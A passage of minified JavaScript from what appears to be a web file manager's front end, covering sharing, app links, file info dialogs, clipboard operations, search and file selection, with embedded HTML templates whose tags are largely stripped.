input[name]").each(function(){var t=urlEncode($(this).val());"checkbox"==$(this).attr("type")&&(t=$(this).attr("checked")?"1":""),e+="&"+$(this).attr("name")+"="+t}),h(e,function(e){e.code?(Tips.tips(LNG.success,!0),G.selfShare=e.info,ui.f5(),s(e.data),$(".share-create-button").text(LNG.share_save)):Tips.tips(e)})}),$(".content-info .open-window").unbind("click").bind("click",function(){window.open($("input.share-url").val())}),$(".content-info .qrcode").unbind("click").bind("click",function(){core.qrcode($("input.share-url").val())});var e=$("input.share-url"),a=e.get(0);e.unbind("hover click").bind("hover click",function(){$(this).focus();var t=e.val().length;if($.browser.msie){var i=a.createTextRange();i.moveEnd("character",-a.value.length),i.moveEnd("character",t),i.moveStart("character",0),i.select()}else a.setSelectionRange(0,t)})};s(t),r()},v=function(e){$.ajax({url:G.appHost+"setting/set&k=wall&v="+urlEncode(e),dataType:"json",success:function(e){Tips.tips(e)}})},g=function(e,t,a,i,n){if(!(1>e.length)){var o,s=G.myDesktop;i&&(s=core.pathFather(e)),o="folder"==a?"ui.path.list(hashDecode('"+hashEncode(e)+"'));":"ui.path.open(hashDecode('"+hashEncode(e)+"'));";var r=urlEncode(s+t+".oexe"),l=core.getPathIcon(e);""==l.icon&&(l.icon=a),$.ajax({url:G.appHost+"explorer/mkfile&path="+r,type:"POST",dataType:"json",data:{content:jsonEncode({type:"app_link",content:o,icon:l.icon})},success:function(e){Tips.tips(e),e.code&&(ShareData.frameTop("",function(e){e.ui.f5()}),"function"==typeof n&&n(e.info))}})}},b=function(e,t){if(!(1>e.length)){var a=core.pathThis(e),i=core.pathFather(e);jsrun="core.explorerCode('"+urlEncode(e)+"');";var n=urlEncode(i+a+"_project.oexe");$.ajax({url:G.appHost+"explorer/mkfile&path="+n,type:"POST",dataType:"json",data:'content={"type":"app_link","content":"'+jsrun+'","icon":"folder.png"}',success:function(e){e.code&&"function"==typeof t&&t(e.info)}})}},y=function(e,t,a){if(e){var i=G.appHost+"explorer/imageRotate&rotate="+t+"&path="+urlEncode(e);$.ajax({url:i,beforeSend:function(){Tips.loading(LNG.loading)},error:core.ajaxError,success:function(e){return e?(Tips.close(e),e.code&&"function"==typeof a&&a(e),void 0):(Tips.close(LNG.php_env_error_gd,!1),void 0)}})}},k=function(t){var a={};a.fileInfo=e("./tpl/fileinfo/fileInfo.html"),a.pathInfo=e("./tpl/fileinfo/pathInfo.html"),a.pathInfoMore=e("./tpl/fileinfo/pathInfoMore.html"),1>t.length&&(t=[{path:G.thisPath,type:"folder"}]);var i="info";1==t.length&&(i="file"==t[0].type?core.pathExt(t[0].path):"folder"),Tips.loading(LNG.getting),core.fileInfo(n(t),function(e){if(!e.code)return Tips.close(e),void 0;Tips.close(LNG.get_success,!0);var n="pathInfoMore",o=LNG.info;1==t.length&&(n="folder"==t[0].type?"pathInfo":"fileInfo",o=core.pathThis(t[0].path),o.length>15&&(o=o.substr(0,15)+"... "+LNG.info));var s=template.compile(a[n]),r=UUID();e.data.is_root=G.isRoot,e.data.LNG=LNG,e.data.atime=date(LNG.time_type_info,e.data.atime),e.data.ctime=date(LNG.time_type_info,e.data.ctime),e.data.mtime=date(LNG.time_type_info,e.data.mtime),e.data.sizeFriendly=pathTools.fileSize(e.data.size);var l=$.dialog({id:r,padding:5,ico:core.iconSmall(i),fixed:!0,title:o,content:s(e.data),ok:!0}),c=15*$(".aui-outer .pathinfo").length;l.DOM.wrap.css({left:"+="+c+"px",top:"+="+c+"px"}),x(r,t)})},x=function(e,t){var a=$("."+e);a.find(".open-window").bind("click",function(){window.open(a.find("input.download-url").val())}),a.find(".qrcode").unbind("click").bind("click",function(){core.qrcode(a.find("input.download-url").val(),a.find(".qrcode").get(0))});var i=a.find(".file-md5-loading");if(1==i.length){var o=n(t);o+="&getMd5=1",core.fileInfo(o,function(e){i.removeClass("file-md5-loading"),e.code?i.html(e.data.fileMd5):i.html(LNG.error)})}var s=a.find("input.download-url"),r=s.get(0);s.unbind("hover click").bind("hover click",function(){$(this).focus();var e=s.val().length;if($.browser.msie){var t=r.createTextRange();t.moveEnd("character",-r.value.length),t.moveEnd("character",e),t.moveStart("character",0),t.select()}else r.setSelectionRange(0,e)}),a.find(".edit-chmod").click(function(){var e=$(this).parent().find("input"),a=$(this);$.ajax({url:G.appHost+"explorer/pathChmod&mod="+e.val(),type:"POST",data:n(t),beforeSend:function(){a.text(LNG.loading)},error:function(){a.text(LNG.button_save)},success:function(e){a.text(e.data).animate({opacity:.6},400,0).delay(1e3).animate({opacity:1},200,0,function(){a.text(LNG.button_save)}),e.code&&ui.f5()}})})},w=function(e,t,a){var i=function(){$.ajax({url:G.appHost+"fav/del&name="+urlEncode(e),dataType:"json",async:!1,success:function(e){"function"==typeof t&&t(e)}})};return a?(i(),void 0):($.dialog({id:"dialog-fav-remove",fixed:!0,icon:"question",title:LNG.fav_remove,width:200,padding:"40px 20px",content:LNG.fav_remove+"?",ok:i,cancel:!0}),void 0)},N=function(e){if(e){if(-1==trim(core.pathClear(e.path),"/").indexOf("/")){var t=core.getPathIcon(e.path,e.name);""!=t.icon&&(e.ext=t.icon,e.name=t.name)}"/"==e.path&&(e.name="Home"),$.ajax({url:G.appHost+"fav/add",dataType:"json",data:e,success:function(e){Tips.tips(e),e.code&&!core.isApp("desktop")&&ui.tree.refreshFav()}})}},L=function(e){var t={};return t.type=e.find("input[type=radio]:checked").val(),t.content=e.find("textarea").val(),t.group=e.find("[name=group]").val(),e.find("input[type=text]").each(function(){var e=$(this).attr("name");t[e]=$(this).val()}),e.find("input[type=checkbox]").each(function(){var e=$(this).attr("name");t[e]="checked"==$(this).attr("checked")?1:0}),t},_=function(e){e.find(".type input").change(function(){var t=$(this).attr("apptype");e.find("[data-type]").addClass("hidden"),e.find("[data-type="+t+"]").removeClass("hidden")}),e.find(".app-edit-select-icon").unbind("click").bind("click",function(){var t=G.basicPath+"static/images/file_icon/icon_app/";G.isRoot||(t=""),core.api.pathSelect({type:"file",title:LNG.path_api_select_file,firstPath:t},function(t){var t=core.path2url(t);e.find(".app-edit-select-icon-input").val(t)})}),e.find(".size-full").unbind("click").bind("click",function(){var t=$(this).prop("checked");t?(e.find("[name=width]").val("100%"),e.find("[name=height]").val("100%")):(e.find("[name=width]").val("800"),e.find("[name=height]").val("600"))})},C=function(t,a,i){var n,o,s,r=LNG.app_create,l=UUID(),c=e("./tpl/appEdit.html"),d=template.compile(c);switch(void 0==i&&(i="userEdit"),"rootEdit"==i&&(t=t),"userEdit"==i||"rootEdit"==i?(r=LNG.app_edit,s=d({LNG:LNG,uuid:l,data:t,appType:G.settings.appType})):s=d({LNG:LNG,uuid:l,data:{},appType:G.settings.appType}),$.dialog({fixed:!0,width:450,id:l,padding:15,title:r,content:s,button:[{name:LNG.preview,callback:function(){return core.openApp(L(n)),!1}},{name:LNG.button_save,focus:!0,callback:function(){var e=L(n);switch(i){case"userAdd":var s=urlEncode(G.thisPath+e.name);o=G.appHost+"app/userApp&action=add&path="+s;break;case"userEdit":o=G.appHost+"app/userApp&path="+urlEncode(t.path);break;case"rootAdd":o=G.appHost+"app/add&name="+urlEncode(e.name);break;case"rootEdit":o=G.appHost+"app/edit&name="+urlEncode(e.name)+"&old_name="+urlEncode(t.name);break;default:}$.ajax({url:o,type:"POST",dataType:"json",data:{data:urlEncode(jsonEncode(e))},beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(e){if(Tips.close(e),e.code)if("rootEdit"==i||"rootAdd"==i){if(!e.code)return;ShareData.frameTop("Openapp_store",function(e){e.App.reload()})}else"function"==typeof a?a():ui.f5()}})}}]}),n=$("."+l),G.isRoot||$(".appbox .appline .right a.open").remove(),t.group&&n.find("option").eq(t.group).attr("selected",1),n.find(".aui-content").css("overflow","inherit"),i){case"userEdit":n.find(".name").addClass("hidden"),n.find(".desc").addClass("hidden"),n.find(".group").addClass("hidden"),n.find("option[value="+t.group+"]").attr("checked",!0),"url"!=t.type&&n.find(".appline[data-type=url]").addClass("hidden");break;case"userAdd":n.find(".desc").addClass("hidden"),n.find(".group").addClass("hidden"),n.find("[apptype=url]").attr("checked",!0),n.find("[data-type=url] input[name=resize]").attr("checked",!0),n.find("input[name=width]").attr("value","800"),n.find("input[name=height]").attr("value","600"),n.find("input[name=icon]").attr("value","oexe.png");break;case"rootAdd":n.find("[apptype=url]").attr("checked",!0),n.find("[data-type=url] input[name=resize]").attr("checked",!0),n.find("input[name=width]").attr("value","800"),n.find("input[name=height]").attr("value","600"),n.find("input[name=icon]").attr("value","oexe.png");break;case"rootEdit":n.find("option[value="+t.group+"]").attr("selected",!0),"url"!=t.type&&n.find(".appline[data-type=url]").addClass("hidden");break;default:}_(n)},T=function(){core.appStore()},S=function(e){e&&4>e.length&&"http"!=e.substring(0,4)||$.ajax({url:G.appHost+"app/getUrlTitle&url="+e,dataType:"json",beforeSend:function(){Tips.loading()},success:function(t){var a=t.data;a=a.replace(/[\/\\]/g,"_"),Tips.close(t);var i={content:e,type:"url",desc:"",group:"others",icon:"internet.png",name:a,resize:1,simple:0,height:"70%",width:"90%"},n=urlEncode(G.thisPath+a);e=G.appHost+"app/userApp&action=add&path="+n,$.ajax({url:e,type:"POST",dataType:"json",data:{data:urlEncode(jsonEncode(i))},success:function(e){Tips.close(e),e.code&&ui.f5()}})}})};return{makeJson:n,appEdit:C,appList:T,appAddURL:S,share:u,shareBox:f,setBackground:v,createLink:g,createProject:b,imageRotate:y,newFile:o,newFolder:s,rname:r,zipDownload:c,zip:d,unZip:p,info:k,remove:l,fav:N,favRemove:w}}),define("app/path/tpl/fileinfo/fileInfo.html",[],"
    \n {{if downloadPath}}\n
    \n
    {{LNG.download_address}}:
    \n
    \n \n
    \n \n \n
    \n
    \n
    \n
    \n
    \n {{/if}}\n\n
    \n
    {{LNG.address}}:
    \n
    {{path |kod.window.htmlEncode}}
    \n
    \n
    \n
    \n
    {{LNG.size}}:
    \n
    {{sizeFriendly}} ({{size}} Byte)
    \n
    \n
    \n\n {{if fileMd5}}\n
    \n
    MD5:
    \n
    {{fileMd5}}
    \n
    \n
    \n {{/if}}\n\n {{if imageSize}}\n
    \n
    {{LNG.image_size}}:
    \n
    {{imageSize.width}} × {{imageSize.height}}
    \n
    \n
    \n {{/if}}\n\n
    \n\n {{if ctime}}\n
    \n
    {{LNG.create_time}}
    \n
    {{ctime}}
    \n
    \n
    \n {{/if}}\n\n {{if mtime}}\n
    \n
    {{LNG.modify_time}}
    \n
    {{mtime}}
    \n
    \n
    \n {{/if}}\n\n {{if atime}}\n
    \n
    {{LNG.last_time}}
    \n
    {{atime}}
    \n
    \n
    \n {{/if}}\n\n {{if owner}}\n
    \n
    {{LNG.file_info_owner}}
    \n
    {{owner}}
    \n
    \n
    \n {{/if}}\n\n {{if group}}\n
    \n
    {{LNG.file_info_group}}
    \n
    {{group}}
    \n
    \n
    \n {{/if}}\n \n {{if mode}}\n
    \n
    \n
    {{LNG.permission}}:
    \n
    {{mode}}
    \n
    \n
    \n {{if is_root==\"1\"}}\n
    \n
    {{LNG.permission_edit}}:
    \n
    \n
    \n
    \n
    \n {{/if}}\n {{/if}}\n
    \n"),define("app/path/tpl/fileinfo/pathInfo.html",[],"
    \n
    \n
    {{LNG.address}}:
    \n
    {{path |kod.window.htmlEncode}}
    \n
    \n
    \n
    \n
    {{LNG.size}}:
    \n
    {{sizeFriendly}} ({{size}} Byte)
    \n
    \n
    \n
    \n
    {{LNG.contain}}:
    \n
    {{fileCount}} {{LNG.file}},{{folderCount}} {{LNG.folder}}
    \n
    \n
    \n \n
    \n {{if ctime}}\n
    \n
    {{LNG.create_time}}
    \n
    {{ctime}}
    \n
    \n
    \n {{/if}}\n\n {{if mtime}}\n
    \n
    {{LNG.modify_time}}
    \n
    {{mtime}}
    \n
    \n
    \n {{/if}}\n\n {{if atime}}\n
    \n
    {{LNG.last_time}}
    \n
    {{atime}}
    \n
    \n
    \n {{/if}}\n\n {{if owner}}\n
    \n
    {{LNG.file_info_owner}}
    \n
    {{owner}}
    \n
    \n
    \n {{/if}}\n\n {{if group}}\n
    \n
    {{LNG.file_info_group}}
    \n
    {{group}}
    \n
    \n
    \n {{/if}}\n\n {{if mode}}\n
    \n
    \n
    {{LNG.permission}}:
    \n
    {{mode}}
    \n
    \n
    \n {{if is_root==\"1\"}}\n
    \n
    {{LNG.permission_edit}}:
    \n
    \n
    \n
    \n
    \n {{/if}}\n {{/if}}\n
    \n"),define("app/path/tpl/share.html",[],'
    \n
    \n
    {{LNG.share_title}}
    \n \n
    \n
    \n
    \n {{LNG.share_path}}:\n \n
    \n
    \n
    \n {{LNG.share_name}}:\n \n \n \n \n \n
    \n
    \n\n \n\n \n
    \n \n
    '),define("app/path/tpl/fileinfo/pathInfoMore.html",[],"
    \n
    \n
    {{LNG.info}}:
    \n
    \n {{fileCount}} {{LNG.file}},{{folderCount}} {{LNG.folder}}
    \n
    \n
    \n
    \n
    \n
    {{LNG.size}}:
    \n
    {{sizeFriendly}} ({{size}} Byte)
    \n
    \n
    \n \n
    \n
    \n
    {{LNG.permission}}:
    \n
    {{mode}}
    \n
    \n
    \n {{if is_root==\"1\"}}\n
    \n
    {{LNG.permission_edit}}:
    \n
    \n
    \n
    \n
    \n {{/if}}\n
    \n"),define("app/path/tpl/appEdit.html",[],"
    \n
    \n
    {{LNG.name}}
    \n
    \n
    \n
    \n
    \n
    {{LNG.app_desc}}
    \n
    \n
    \n
    \n
    \n
    {{LNG.app_icon}}
    \n
    \n \n
    \n
    \n
    \n
    \n
    {{LNG.app_group}}
    \n
    \n \n
    \n
    \n
    \n
    \n
    {{LNG.app_type}}
    \n
    \n \n \n \n \n \n \n
    \n
    \n
    \n\n
    \n
    {{LNG.app_display}}
    \n
    \n \n \n \n \n
    \n
    \n
    \n
    \n
    {{LNG.app_size}}
    \n
    \n ({{LNG.width}})  \n ({{LNG.height}})\n\n \n \n
    \n
    \n
    \n
    \n \n \n
    {{LNG.app_url}}
    \n
    \n
    \n
    \n
    \n"),define("app/path/clipboard",[],function(){var e=function(e){return ui.path.pathOperate.makeJson(e) },t=function(t){1>t.length||$.ajax({url:G.appHost+"explorer/pathCopy",type:"POST",dataType:"json",data:e(t),error:core.ajaxError,success:function(e){Tips.tips(e)}})},a=function(t){1>t.length||$.ajax({url:G.appHost+"explorer/pathCute",type:"POST",dataType:"json",data:e(t),error:core.ajaxError,success:function(e){Tips.tips(e)}})},i=function(e,t){e&&(Tips.loading(LNG.moving),setTimeout(function(){var a=G.appHost+"explorer/pathPast&path="+urlEncode(e);$.ajax({url:a,dataType:"json",error:core.ajaxError,success:function(e){Tips.close(e.data,e.code),"function"==typeof t&&t(e.info)}})},50))},n=function(t,a,i){a&&$.ajax({url:G.appHost+"explorer/pathCuteDrag",type:"POST",dataType:"json",data:e(t)+"&path="+urlEncode(a+"/"),beforeSend:function(){Tips.loading(LNG.moving)},error:core.ajaxError,success:function(e){Tips.close(e),e.code&&core.playSound("drag_drop"),"function"==typeof i&&i(e.info)}})},o=function(t,a,i,n){a&&(void 0==n&&(n=0),$.ajax({url:G.appHost+"explorer/pathCopyDrag",type:"POST",dataType:"json",data:e(t)+"&path="+urlEncode(a+"/")+"&filename_auto="+Number(n),beforeSend:function(){Tips.loading(LNG.moving)},error:core.ajaxError,success:function(e){Tips.close(e),e.code&&core.playSound("drag_drop"),"function"==typeof i&&i(e.info)}}))},s=function(e,t){var a="style='height:150px;border-left: 3px solid #def;overflow:auto;margin:20px;background: #f0f8ff;padding:20px;width:300px'",i="
    "+LNG.clipboard_null+"
    ";if(0!=e.length){i="
    "+LNG.clipboard_state+LNG[t]+"
    ";for(var n=40,o=0;e.length>o;o++){var s=e[o],r=s.path;r=n>r.length?r:"..."+r.substr(-n),i+="
    "+s.type+": "+r+""}i+='
    "}return i},r=function(){$.ajax({url:G.appHost+"explorer/clipboard",dataType:"json",error:core.ajaxError,success:function(e){e.code&&($.dialog({id:"dialog-clipboard",title:LNG.clipboard,width:400,content:s(e.data,e.info)}),$(".clipboard-clear").one("click",function(){Tips.tips(LNG.success),$.get(G.appHost+"explorer/clipboard&clear=ok"),$.dialog.list["dialog-clipboard"].close()}))}})},l=function(){var e=function(){var e=G.appHost+"explorer/fileUpload";return"share"==G.sharePage&&"1"==G.shareInfo.canUpload&&(e=G.appHost+"share/fileUpload&user="+G.user+"&sid="+G.sid),e},t=function(e){if(e.clipboardData&&e.clipboardData.items){var t=Array.prototype.filter.call(e.clipboardData.items,function(e){return e.type.indexOf("image")>=0});Array.prototype.forEach.call(t,function(e){var t=new FileReader;t.onloadend=function(){a(this.result)},t.readAsDataURL(e.getAsFile())})}},a=function(t){if(!core.uploadCheck("explorer.serverDownload"))return!1;t=t.replace("data:image/png;base64,","");var a=date("20yymd-his")+".png";$.ajax({type:"POST",dataType:"json",url:e()+"&base64Upload=1&upload_to="+urlEncode(G.thisPath)+"&name="+a,data:{file:t},beforeSend:function(){Tips.loading(LNG.loading)},error:core.ajaxError,success:function(e){Tips.close(e)}})};$(window).on("paste",t)};return l(),{copy:t,cute:a,past:i,cuteDrag:n,copyDrag:o,clipboard:r}}),define("app/path/search",[],function(e){var t=e("./tpl/search.html"),a=e("./tpl/searchList.html");return function(e,i){i||(i=G.thisPath);var n,o,s=function(){var a=trim(core.pathClear(i),"/");if(0==a.indexOf(G.KOD_USER_SHARE)&&-1==a.indexOf("/")||a==G.KOD_USER_FAV||a==G.KOD_GROUP_ROOT_ALL)return Tips.tips(LNG.path_cannot_search,!1),void 0;template.helper("searchResultPrase",c);var s=template.compile(t);0==$(".dialog-do-search").length?(n=$.dialog({id:"dialog-do-search",padding:0,fixed:!0,ico:core.icon("search"),resize:!0,title:LNG.search,width:460,height:480,content:s({LNG:LNG})}),o=p(),o.path=i,""!=e&&(o.search=e),$("#search-path").val(o.path),$("#search-value").val(o.search),d()):($.dialog.list["dialog-do-search"].display(!0),e&&$("#search-value").val(e),$("#search-path").val(i),l())},r=function(){return o={search:$("#search-value").val(),path:$("#search-path").val(),is_content:Number($("#search-is-content").is(":checked")),is_case:Number($("#search-is-case").is(":checked")),ext:$("#search-ext").val()}},l=function(){r(),f(o)},c=function(e){var t=htmlEncode($("#search-value").val());if(e=htmlEncode(e),o.is_case)e=e.replace(t,''+t+"");else{var a=e.toLowerCase().indexOf(t.toLowerCase());e=e.substr(0,a)+''+e.substr(a,t.length)+""+e.substr(a+t.length)}return e},d=function(){$("#search-value").die("keyup").live("keyup",function(){core.isApp("editor")||ui.path.setSearchByStr($(this).val())}),$("#search-value,#search-ext,#search-path").keyEnter(l),$(".search-header .btn").die("click").live("click",l),$(".search-result .file-item .file-info").die("click").live("click",function(e){var t=$(this).parent();return t.toggleClass("open"),t.find(".result-item").slideToggle(200),stopPP(e),!1}),$(".search-result .file-item .file-info .goto").die("click").live("click",function(e){var t=$(this).parent().parent(),a=pathHashDecode(t.attr("data-path")),i=core.pathFather(a);return core.openPath(i),setTimeout(function(){core.isApp("explorer")&&ui.path.setSelectByFilename(a)},200),stopPP(e),!1}),$(".search-result .file-item .file-info .title").die("click").live("click",function(e){var t=$(this).parent().parent(),a=pathHashDecode(t.attr("data-path"));return kodApp.setLastOpenTarget(t),kodApp.open(a,t.attr("data-ext")),stopPP(e),!1}),$(".search-result .file-item .result-info").die("click").live("click",function(e){var t=$(this).parent().parent(),a=pathHashDecode(t.attr("data-path"));$(".search-result .file-item .result-info.this").removeClass("this"),$(this).addClass("this");var i=parseInt($(this).find(".line").attr("data-line"));return ShareData.data("FILE_SEARCH_AT",{search:$("#search-value").val(),line:i,lineIndex:$(this).parent().find("[data-line="+i+"]").index($(this).find(".line"))}),kodApp.open(a,t.attr("data-ext"),"aceEditor"),stopPP(e),!1}),$(".search-header input[type=checkbox]").on("click",function(){r(),p(o)})},p=function(e){var t="box_search_config";if(void 0==e){var e=LocalData.getConfig(t);return e||(e={search:"",is_content:0,is_case:0,ext:""}),$("#search-value").val(e.search).textSelect(),e.is_content?$("#search-is-content").attr("checked","checked"):$("#search-is-content").removeAttr("checked"),e.is_case?$("#search-is-case").attr("checked","checked"):$("#search-is-case").removeAttr("checked"),$("#search-ext").val(e.ext),e}return LocalData.setConfig(t,e)},u=function(e){var t=$(".file-items"),i=$(".search-desc");if(!e.code)return i.html(e.data),t.html(""),void 0;if(0==e.data.fileList.length&&0==e.data.folderList.length)return i.html(LNG.search_null),t.html(""),void 0;var n=template.compile(a);if(t.html(n({code:e.code,data:e.data,LNG:LNG})),o.is_content){for(var s=e.data.fileList,r=0,l=0;s.length>l;l++)s[l].searchInfo&&(r+=s[l].searchInfo.length);i.html(LNG.search_result+": "+r+"(in "+s.length+" files)"),e.data.error_info&&i.html(""+LNG.seach_result_too_more+"")}else i.html(e.data.fileList.length+" "+LNG.file+", "+e.data.folderList.length+LNG.folder+".")},f=function(e){p(e),$("#search-value").textFocus();var t=$(".file-items"),a=$(".search-desc");if(!e.search||!e.path)return a.html(LNG.search_info),t.html(""),void 0;var i=G.appHost+"explorer/search";G.sharePage!==void 0&&(i=G.appHost+"share/search&user="+G.user+"&sid="+G.sid),$.ajax({url:i,dataType:"json",type:"POST",data:e,beforeSend:function(){a.hide().html(LNG.searching+'').fadeIn(100)},error:function(){core.ajaxError(),a.html(LNG.error)},success:function(e){u(e)}})};s()}}),define("app/path/tpl/search.html",[],"\n\n"),define("app/path/tpl/searchList.html",[],'\n{{each data.folderList v i}}\n
  • \n
    \n \n {{\'folder\' |core.icon}}\n {{v.name | searchResultPrase}}\n \n
    \n
  • \n{{/each}}\n\n\n{{each data.fileList v i}}\n {{if v.searchInfo}}\n
  • \n
    \n \n {{v.ext |core.icon}}\n \n {{v.name | kod.window.htmlEncode}}\n \n {{v.searchInfo.length}}\n \n
    \n
      \n {{each v.searchInfo value index}}\n
    • \n {{value.line}}:\n {{@value.str | searchResultPrase}}\n
    • \n {{/each}}\n
    \n
  • \n {{else}}\n
  • \n
    \n \n {{v.ext |core.icon}}\n {{v.name | searchResultPrase}}\n \n
    \n
  • \n {{/if}}\n{{/each}}\n\n'),define("app/path/tpl/file/create.html",[],"
    \n {{if listType=='list'}}{{/if}}\n
    \n \n {{if type=='folder'}}\n
    {{\"folder\" | core.icon}}
    \n {{else}}\n
    {{ext | core.icon}}
    \n {{/if}}\n
    \n {{if listType=='icon'}}\n \n {{else}}\n \n {{/if}}\n
    \n
    \n
    \n
    \n
    \n"),define("app/src/explorer/fileLight",[],function(){var e=$(),t=$(),a=function(){var e;e="split"!=G.userConfig.listType?$(".bodymain .file-continer .file"):$(".bodymain .file-continer .split-select .file"),t=e,f("clear"),Hook.trigger("explorer.fileSelect.init",this)},i=function(){var t=$(Config.SelectClass);e=t,t.length>1&&c(t),f("menu-file"),Hook.trigger("explorer.fileSelect.change",this)},n=function(){if(G.jsonData&&G.jsonData.fileList){var e=G.jsonData.fileList.length+G.jsonData.folderList.length;$(".file-select-info .item-num").html(e+LNG.folder_info_item)}},o=function(){var t="",a=0,i=e;0!=i.length&&(t=i.length+LNG.folder_info_item_select,i.each(function(){a+=parseInt($(this).attr("data-size"))}),0!=a&&(t=t+" ("+pathTools.fileSize(a)+")")),$(".file-select-info .item-select").html(t)},s=function(t){var a=e;if(void 0==t&&a&&a.length>=1&&(t=$(a[a.length-1])),void 0!=t&&!t.inScreen()){var i=$(".bodymain");"split"==G.userConfig.listType&&(i=t.parent());var n=t.offset().top-i.offset().top-i.height()/2+i.scrollTop();i.stop(!0).animate({scrollTop:n},100)}},r=function(e){return core.pathThis(h(e))},l=function(e){return e.find(".ico").attr("filetype")},c=function(e){if(G.jsonData.info)switch(G.jsonData.info.pathType){case G.KOD_USER_RECYCLE:return;case G.KOD_USER_FAV:return e.removeClass("menu-fav-path").addClass("menu-fav-path-more"),void 0;case G.KOD_USER_SHARE:if(-1==trim(G.thisPath,"/").search("/"))return e.removeClass("menu-share-path").addClass("menu-share-path-more"),void 0;case G.KOD_GROUP_ROOT_SELF:case G.KOD_GROUP_ROOT_ALL:return e.removeClass("menu-group-root").addClass("menu-group-root-more"),void 0;default:}e.removeClass("menu-file menu-folder").addClass("menu-more"),f()},d=function(e){var t={"file-box":"menu-file","folder-box":"menu-folder","menu-recycle-path":"menu-recycle-path","menu-share-path-more":"menu-share-path","menu-fav-path-more":"menu-fav-path","menu-group-root-more":"menu-group-root","menu-default":"menu-default"};e.removeClass("menu-more");for(var a in t)e.hasClass(a)&&e.addClass(t[a]);f()},p=function(){var t=[];if(0!=e.length)return e.each(function(){t.push(h($(this)))}),t},u=function(){if(0!=e.length){var t=e;t.removeClass(Config.SelectClassName),t.each(function(){d($(this))}),e=$(),f(),Hook.trigger("explorer.fileSelect.change",this)}},f=function(){0==e.length?($(".drop-menu-action li").addClass("disabled"),$(".drop-menu-action #past").removeClass("disabled"),$(".drop-menu-action #info").removeClass("disabled")):$(".drop-menu-action li").removeClass("disabled")},h=function(e,t){return void 0==t&&(t="data-path"),void 0!=e.attr("data-path-children")&&(t="data-path-children"),pathHashDecode(e.attr(t))};return{init:a,name:r,path:h,type:l,fileListSelect:function(t){return t&&(e=t),e},fileListAll:function(e){return e&&(t=e),t},select:i,setInView:s,listNumberSet:n,selectNumSet:o,setMenu:c,resumeMenu:d,getAllName:p,clear:u,menuAction:f}}),define("app/src/explorer/fileSelect",[],function(){var e=!1,t=!1,a=!1,i=function(){$(Config.FileBoxClass).die("touchstart").live("touchstart",function(){$(this).hasClass("select")?ui.path.open():(ui.fileLight.clear(),$(this).removeClass("select"),$(this).addClass("select"),ui.fileLight.select())});var i=function(e){!e.hasClass(Config.TypeFolderClass)&&!e.hasClass("menu-recycle-button")||e.hasClass(Config.SelectClassName)||($(".file-select-drag-temp").removeClass("file-select-drag-temp"),e.addClass("file-select-drag-temp"))},l=function(){};$(Config.FileBoxClass).die("mouseenter").live("mouseenter",function(){t&&i($(this)),e||t||$(this).addClass(Config.HoverClassName),l($(this)),$(this).unbind("mousedown").bind("mousedown",function(e){if($(e.target).is("input")||$(e.target).is("textarea"))return!0;if($(this).focus(),$.contextMenu.hidden(),$(e.target).parents(".children-more").exists())return ui.fileContent.pathChildrenTree($(this)),stopPP(e),!1;if($(e.target).hasClass("item-menu")||$(e.target).parent().hasClass("item-menu"))return $(this).hasClass(Config.SelectClassName)?void 0:(ui.fileLight.clear(),$(this).addClass(Config.SelectClassName),ui.fileLight.select(),!0);if(!$(e.target).hasClass("item-select")&&!$(e.target).parent().hasClass("item-select")){if(!(e.ctrlKey||e.metaKey||e.shiftKey||$(this).hasClass(Config.SelectClassName)))return ui.fileLight.clear(),$(this).addClass(Config.SelectClassName),ui.fileLight.select(),!0;if(3!=e.which||$(this).hasClass(Config.SelectClassName)||(ui.fileLight.clear(),$(this).addClass(Config.SelectClassName),ui.fileLight.select()),(e.ctrlKey||e.metaKey)&&($(this).hasClass(Config.SelectClassName)?a=!0:(ui.fileLight.setMenu($(this)),$(this).addClass(Config.SelectClassName)),ui.fileLight.select()),e.shiftKey){var t=m.fileListAll($(this)),i=m.fileListSelect($(this)),n=t.index($(this));if(0==i.length)w(0,n,t);else{var o=t.index(i.first()),s=t.index(i.last());o>n?w(n,s,t):n>s?w(o,n,t):w(o,n,t)}}return!0}}).unbind("mouseup").bind("mouseup",function(){return $(".file-select-drag-temp").removeClass("file-select-drag-temp"),!0})}).die("mouseleave").live("mouseleave",function(){$(this).removeClass(Config.HoverClassName),t&&$(this).removeClass("file-select-drag-temp")}).die("click").live("click",function(e){if(stopPP(e),t)return!1;if($(e.target).hasClass("item-menu")||$(e.target).parent().hasClass("item-menu")){var i=$(this).find(".item-menu");return $(this).contextMenu({x:i.offset().left+i.width(),y:i.offset().top}),void 0}return $(e.target).hasClass("item-select")||$(e.target).parent().hasClass("item-select")?($(this).toggleClass(Config.SelectClassName),ui.fileLight.select(),void 0):(0==$(this).find(".textarea").length&&0==$(".file-draging-box").length&&(e.ctrlKey||e.metaKey||e.shiftKey?(e.ctrlKey||e.metaKey)&&a&&(a=!1,ui.fileLight.resumeMenu($(this)),$(this).removeClass(Config.SelectClassName),ui.fileLight.select()):(ui.fileLight.clear(),$(this).addClass(Config.SelectClassName),ui.fileLight.select(),r($(this)))),void 0)}).die("dblclick").live("dblclick",function(e){if(!($(e.target).is("textarea")||$(e.target).is("input")||$(e.target).hasClass("children-more")||$(e.target).hasClass("children-more-cert")||$(e.target).hasClass("item-menu")||$(e.target).parent().hasClass("item-menu")||$(e.target).hasClass("item-select")||$(e.target).parent().hasClass("item-select")))if(e.altKey)ui.path.info();else{if(1!=ui.fileLight.fileListSelect().length)return;if("split"==G.userConfig.listType&&s($(this))){var t=ui.fileLight.path($(this));return G.thisPath="",$(".file-list-split .split-box").remove(),ui.path.list(t),void 0}ui.path.open()}}),n(),o(),$(Config.FileBoxTittleClass).die("dblclick").live("dblclick",function(e){if(!$(this).hasClass("db-click-rename"))return!0;if(!($(this).find(".textarea").length>0)){var t=$(this).parents(".file");return t.hasClass("systemBox"),ui.path.rname(),stopPP(e),!1}})},n=function(){var e;$("#folder-list-tree a").die("mouseenter").live("mouseenter",function(){if(t){($(this).hasClass("menu-tree-folder")||$(this).hasClass("menu-tree-folder-fav"))&&$(this).addClass("curDropTreeNode"),clearTimeout(e),e=!1;var a=ui.tree.zTree(),i=a.getNodeByTId($(this).parent().attr("id"));!i.open&&i.isParent&&(e=setTimeout(function(){a.expandNode(i,!0)},600))}}).die("mouseup").live("mouseup",function(){if(t){$(this).removeClass("curDropTreeNode"),clearTimeout(e),e=!1;var 